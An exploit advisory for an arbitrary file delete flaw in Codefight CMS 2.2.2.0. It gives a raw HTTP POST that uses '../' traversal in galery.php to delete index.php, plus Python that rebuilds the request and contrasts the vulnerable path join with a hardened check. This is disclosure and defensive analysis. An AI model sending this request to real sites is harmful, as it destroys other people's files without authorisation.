Codefight CMS (tiny_mce) Arbitrary File Delete Vulnerability

##########################################
# Exploit Title: Codefight CMS (tiny_mce) Arbitrary File Delete Vulnerability
# Date: 2013-03-12
# Author: DaOne aka Mocking Bird
# Software Link: http://codefight.org/
# Category: webapps/php
# Version: 2.2.2.0 + old versions
##########################################

# PoC
Example to delete index.php. galery.php takes the gallery directory from the `dirname` query parameter and the file to act on from the `fname` form field; with `act=delete` the file is removed. Neither value is filtered for `../` sequences, so the deletion is not confined to the gallery directory: relative to the advimage plugin directory, `dirname` resolves to the CMS root's `media/` and `fname` steps back up out of it to the CMS root's index.php. The request as shown carries no session cookie.

POST /codefight-2.2.2.0/skin/admin/default/js/tiny_mce/plugins/advimage/galery.php?dirname=../../../../../../../media/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/codefight-2.2.2.0/skin/admin/default/js/tiny_mce/plugins/advimage/galery.php?
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------30060290783402
Content-Length: 402

-----------------------------30060290783402\r\n
Content-Disposition: form-data; name="upload"; filename=""\r\n
Content-Type: application/octet-stream\r\n
\r\n
\r\n
-----------------------------30060290783402\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
delete\r\n
-----------------------------30060290783402\r\n
Content-Disposition: form-data; name="fname"\r\n
\r\n
../index.php\r\n
-----------------------------30060290783402--\r\n

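As an added example (not part of the original advisory), the Python below rebuilds the PoC request offline and models the path handling it abuses: `unchecked_target` joins `dirname` and `fname` the way the vulnerable script evidently does, while `resolve_within` is a hardened variant that requires a bare file name and rejects any resolved path outside the gallery directory. The install path under `/var/www/html` and the use of `posixpath.normpath` in place of PHP's `realpath()` are assumptions; only the directory depth below `codefight-2.2.2.0/` matters for the result.

```python
import posixpath

# Boundary, query parameter and form fields copied from the advisory's PoC.
BOUNDARY = "---------------------------30060290783402"
POC_DIRNAME = "../../../../../../../media/"
POC_FIELDS = [
    ("upload", "", ""),               # empty file part, filename=""
    ("act", "delete", None),          # action selector
    ("fname", "../index.php", None),  # file to delete, relative to dirname
]

# Assumed install location (not stated on the page).
WEBROOT = "/var/www/html"
GALLERY_BASE = WEBROOT + "/codefight-2.2.2.0/skin/admin/default/js/tiny_mce/plugins/advimage"


def build_multipart(fields, boundary=BOUNDARY):
    """Encode (name, value, filename) tuples as multipart/form-data with CRLF
    line endings. filename=None produces a plain field, as in the PoC body."""
    lines = []
    for name, value, filename in fields:
        lines.append("--" + boundary)
        if filename is None:
            lines.append('Content-Disposition: form-data; name="%s"' % name)
        else:
            lines.append('Content-Disposition: form-data; name="%s"; filename="%s"'
                         % (name, filename))
            lines.append("Content-Type: application/octet-stream")
        lines.append("")
        lines.append(value)
    lines.append("--" + boundary + "--")
    return ("\r\n".join(lines) + "\r\n").encode()


def build_poc_request(host="localhost", dirname=POC_DIRNAME, fields=POC_FIELDS):
    """Return the raw HTTP request bytes; Content-Length is computed, not hard-coded."""
    body = build_multipart(fields)
    path = ("/codefight-2.2.2.0/skin/admin/default/js/tiny_mce/plugins/advimage/"
            "galery.php?dirname=" + dirname)
    headers = [
        "POST %s HTTP/1.1" % path,
        "Host: " + host,
        "Content-Type: multipart/form-data; boundary=" + BOUNDARY,
        "Content-Length: %d" % len(body),
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n").encode() + body


def unchecked_target(base, dirname, fname):
    """Model of the vulnerable behaviour: join the two user-controlled parts onto
    the gallery directory and use whatever path results."""
    return posixpath.normpath(posixpath.join(base, dirname, fname))


def resolve_within(base, dirname, fname):
    """Hardened variant: fname must be a bare file name, and the normalized path
    must stay strictly under base. Raises ValueError otherwise."""
    if not fname or "/" in fname or fname in (".", ".."):
        raise ValueError("fname must be a bare file name")
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, dirname, fname))
    if not candidate.startswith(base + "/"):
        raise ValueError("path escapes gallery directory: " + candidate)
    return candidate


def is_rejected(base, dirname, fname):
    """True if the hardened resolver refuses the request."""
    try:
        resolve_within(base, dirname, fname)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    req = build_poc_request()
    print(req.decode())
    print("vulnerable path ->", unchecked_target(GALLERY_BASE, POC_DIRNAME, "../index.php"))
    print("hardened rejects PoC:", is_rejected(GALLERY_BASE, POC_DIRNAME, "../index.php"))
```

Running the script reproduces the advisory's `Content-Length: 402` from the field values alone, shows the joined path landing on the CMS root's index.php, and shows the hardened resolver refusing the same input while still accepting an ordinary file name inside the gallery.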
-end-




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
